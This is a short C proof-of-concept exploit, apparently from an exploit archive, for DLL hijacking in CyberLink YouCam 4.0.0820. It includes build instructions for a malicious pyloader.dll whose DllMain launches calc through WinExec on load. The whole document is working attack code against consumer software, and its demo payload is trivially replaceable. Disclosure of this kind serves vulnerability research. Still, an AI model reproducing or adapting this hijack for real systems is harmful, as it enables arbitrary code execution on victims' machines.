/*
Exploit Title : CyberLink YouCam 4.0.0820 DLL Hijacking Exploit (pyloader.dll)
Exploit Author : Febriyanto Nugroho
Tested on : Windows 7 Ultimate (32-bit)
gcc -shared -o pyloader.dll youcam-DLL.c
*/
#include <windows.h>
int fuck(){
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
fuck();
return 0;
}